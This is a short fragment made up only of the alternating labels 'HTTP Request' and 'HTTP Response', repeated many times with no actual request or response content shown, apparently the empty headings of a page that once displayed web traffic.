HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request